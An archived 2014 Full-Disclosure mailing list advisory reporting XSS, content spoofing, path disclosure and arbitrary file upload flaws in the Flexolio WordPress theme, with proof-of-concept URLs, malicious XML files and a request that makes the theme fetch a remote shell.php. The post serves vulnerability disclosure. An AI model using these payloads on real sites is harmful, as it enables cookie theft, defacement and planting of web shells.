lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 4 May 2014 21:10:11 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] Multiple vulnerabilities in Flexolio for WordPress

Hello list!

There are Content Spoofing, Cross-Site Scripting, Full path disclosure, 
Abuse of Functionality, Denial of Service and Arbitrary File Upload 
vulnerabilities in Flexolio for WordPress. Which contains TimThumb and 
CU3ER.

In April 2011 I wrote about vulnerabilities in TimThumb 
(http://seclists.org/fulldisclosure/2011/Apr/227) and in April 2014 I wrote 
about vulnerabilities in CU3ER 
(http://seclists.org/fulldisclosure/2014/Apr/244).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Flexolio.

-------------------------
Affected vendors:
-------------------------

Quarterpixel
http://quarterpixel.de

----------
Details:
----------

Content Spoofing (Content Injection) (WASC-12):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

For cross-domain attacks it's needed to have crossdomain.xml at web site 
with xml-files.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://

And also Abuse of Functionality and DoS in vulnerabilities in TimThumb 
(http://seclists.org/fulldisclosure/2011/Apr/227) and Arbitrary File Upload 
vulnerability, which was disclosed after 3,5 months after my disclosure of 
previous holes. They are possible in old versions of the theme, because in 
the last versions of the theme in TimThumb the access to remote sites is 
forbidden.

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php

Full path disclosure (WASC-13):

FPD in php-files of the theme (by default) or in error_log. In index.php and 
other php-files.

http://site/wp-content/themes/webfolio/

------------
Timeline:
------------ 

2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins and later about themes. 
Later informed developers of the plugins and themes.
2014.04.26 - disclosed at my site about Flexolio for WordPress 
(http://websecurity.com.ua/7141/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists